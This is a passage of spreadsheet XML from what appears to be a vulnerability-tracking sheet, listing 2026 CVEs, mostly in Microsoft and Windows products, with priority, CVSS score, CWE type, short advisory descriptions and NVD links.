          <t>Heap-based buffer overflow in Windows Network File System allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69772</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69778</t>
        </is>
      </c>
      <c r="C325" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E325" s="5" t="inlineStr"/>
      <c r="F325" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G325" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H325" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I325" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J325" s="5" t="inlineStr"/>
      <c r="K325" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L325" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69778</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69784</t>
        </is>
      </c>
      <c r="C326" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E326" s="5" t="inlineStr"/>
      <c r="F326" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G326" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H326" s="5" t="inlineStr"/>
      <c r="I326" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J326" s="5" t="inlineStr"/>
      <c r="K326" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L326" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69784</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69797</t>
        </is>
      </c>
      <c r="C327" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E327" s="5" t="inlineStr"/>
      <c r="F327" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G327" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H327" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="I327" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J327" s="5" t="inlineStr"/>
      <c r="K327" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L327" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69797</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69857</t>
        </is>
      </c>
      <c r="C328" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E328" s="5" t="inlineStr"/>
      <c r="F328" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G328" s="5" t="inlineStr">
        <is>
          <t>microsoft, azure</t>
        </is>
      </c>
      <c r="H328" s="5" t="inlineStr">
        <is>
          <t>microsoft:azure_cosmos_db</t>
        </is>
      </c>
      <c r="I328" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J328" s="5" t="inlineStr"/>
      <c r="K328" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L328" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through user-controlled key in Azure Cosmos DB allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69857</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69860</t>
        </is>
      </c>
      <c r="C329" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E329" s="5" t="inlineStr"/>
      <c r="F329" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G329" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H329" s="5" t="inlineStr"/>
      <c r="I329" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J329" s="5" t="inlineStr"/>
      <c r="K329" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L329" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69860</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70178</t>
        </is>
      </c>
      <c r="C330" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E330" s="5" t="inlineStr"/>
      <c r="F330" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G330" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H330" s="5" t="inlineStr">
        <is>
          <t>microsoft:fabric</t>
        </is>
      </c>
      <c r="I330" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J330" s="5" t="inlineStr"/>
      <c r="K330" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L330" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Fabric allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70178</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70203</t>
        </is>
      </c>
      <c r="C331" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E331" s="5" t="inlineStr"/>
      <c r="F331" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G331" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H331" s="5" t="inlineStr"/>
      <c r="I331" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J331" s="5" t="inlineStr"/>
      <c r="K331" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L331" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70203</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70351</t>
        </is>
      </c>
      <c r="C332" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E332" s="5" t="inlineStr"/>
      <c r="F332" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G332" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H332" s="5" t="inlineStr"/>
      <c r="I332" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J332" s="5" t="inlineStr"/>
      <c r="K332" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L332" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft WebP Image Extension allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70351</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70586</t>
        </is>
      </c>
      <c r="C333" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E333" s="5" t="inlineStr"/>
      <c r="F333" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G333" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H333" s="5" t="inlineStr"/>
      <c r="I333" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J333" s="5" t="inlineStr"/>
      <c r="K333" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L333" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Paint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70586</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71336</t>
        </is>
      </c>
      <c r="C334" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E334" s="5" t="inlineStr"/>
      <c r="F334" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G334" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H334" s="5" t="inlineStr"/>
      <c r="I334" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J334" s="5" t="inlineStr"/>
      <c r="K334" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L334" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Work Folder Service allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71336</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71352</t>
        </is>
      </c>
      <c r="C335" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E335" s="5" t="inlineStr"/>
      <c r="F335" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G335" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H335" s="5" t="inlineStr"/>
      <c r="I335" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J335" s="5" t="inlineStr"/>
      <c r="K335" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L335" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows Remote Access Connection Manager allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71352</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71808</t>
        </is>
      </c>
      <c r="C336" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E336" s="5" t="inlineStr"/>
      <c r="F336" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G336" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H336" s="5" t="inlineStr"/>
      <c r="I336" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J336" s="5" t="inlineStr"/>
      <c r="K336" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L336" s="5" t="inlineStr">
        <is>
          <t>A SQL Injection vulnerability in Siam Ordering (siam-server) 1.0.0 allows remote authenticated attackers to execute arbitrary SQL commands via the ${} string concatenation in AdminMapper.java and multiple other Mapper files (including MerchantWithdrawRecordMapper.java and MemberWithdrawRecordMapper.java).</t>
        </is>
      </c>
      <c r="M336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71808</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72883</t>
        </is>
      </c>
      <c r="C337" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E337" s="5" t="inlineStr"/>
      <c r="F337" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G337" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H337" s="5" t="inlineStr"/>
      <c r="I337" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J337" s="5" t="inlineStr"/>
      <c r="K337" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L337" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the WebSocket handlers in apps/dokploy/server/wss/terminal.ts, apps/dokploy/server/wss/docker-container-terminal.ts, apps/dokploy/server/wss/docker-container-logs.ts, and apps/dokploy/server/wss/docker-stats.ts validate organization membership but do not enforce checkServiceAccess, accessedServerIds, or accessedServices, allowing an authenticated organization member to obtain root terminal access and read logs or statistics for restricted servers and services. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72883</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72933</t>
        </is>
      </c>
      <c r="C338" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D338" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E338" s="5" t="inlineStr"/>
      <c r="F338" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G338" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H338" s="5" t="inlineStr"/>
      <c r="I338" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J338" s="5" t="inlineStr"/>
      <c r="K338" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L338" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft WDAC OLE DB provider for SQL allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72933</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72940</t>
        </is>
      </c>
      <c r="C339" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D339" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E339" s="5" t="inlineStr"/>
      <c r="F339" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G339" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H339" s="5" t="inlineStr"/>
      <c r="I339" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J339" s="5" t="inlineStr"/>
      <c r="K339" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L339" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Schannel allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72940</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72950</t>
        </is>
      </c>
      <c r="C340" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D340" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E340" s="5" t="inlineStr"/>
      <c r="F340" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G340" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H340" s="5" t="inlineStr"/>
      <c r="I340" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J340" s="5" t="inlineStr"/>
      <c r="K340" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L340" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="M340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72950</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72959</t>
        </is>
      </c>
      <c r="C341" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D341" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E341" s="5" t="inlineStr"/>
      <c r="F341" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G341" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H341" s="5" t="inlineStr"/>
      <c r="I341" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J341" s="5" t="inlineStr"/>
      <c r="K341" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L341" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="M341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72959</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72960</t>
        </is>
      </c>
      <c r="C342" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D342" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E342" s="5" t="inlineStr"/>
      <c r="F342" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G342" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H342" s="5" t="inlineStr"/>
      <c r="I342" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J342" s="5" t="inlineStr"/>
      <c r="K342" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L342" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72960</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72972</t>
        </is>
      </c>
      <c r="C343" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D343" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E343" s="5" t="inlineStr"/>
      <c r="F343" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G343" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H343" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I343" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J343" s="5" t="inlineStr"/>
      <c r="K343" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L343" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72972</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72973</t>
        </is>
      </c>
      <c r="C344" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D344" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E344" s="5" t="inlineStr"/>
      <c r="F344" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G344" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H344" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I344" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J344" s="5" t="inlineStr"/>
      <c r="K344" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L344" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72973</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73006</t>
        </is>
      </c>
      <c r="C345" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D345" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E345" s="5" t="inlineStr"/>
      <c r="F345" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G345" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H34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5" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J345" s="5" t="inlineStr"/>
      <c r="K345" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L345" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73006</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73012</t>
        </is>
      </c>
      <c r="C346" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E346" s="5" t="inlineStr"/>
      <c r="F346" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G346" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H346" s="5" t="inlineStr"/>
      <c r="I346" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J346" s="5" t="inlineStr"/>
      <c r="K346" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L346" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Management Services allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73012</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73013</t>
        </is>
      </c>
      <c r="C347" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D347" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E347" s="5" t="inlineStr"/>
      <c r="F347" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G347" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H347" s="5" t="inlineStr"/>
      <c r="I347" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J347" s="5" t="inlineStr"/>
      <c r="K347" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L347" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73013</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73016</t>
        </is>
      </c>
      <c r="C348" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D348" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E348" s="5" t="inlineStr"/>
      <c r="F348" s="5" t="n">
        <v>0.006</v>
      </c>
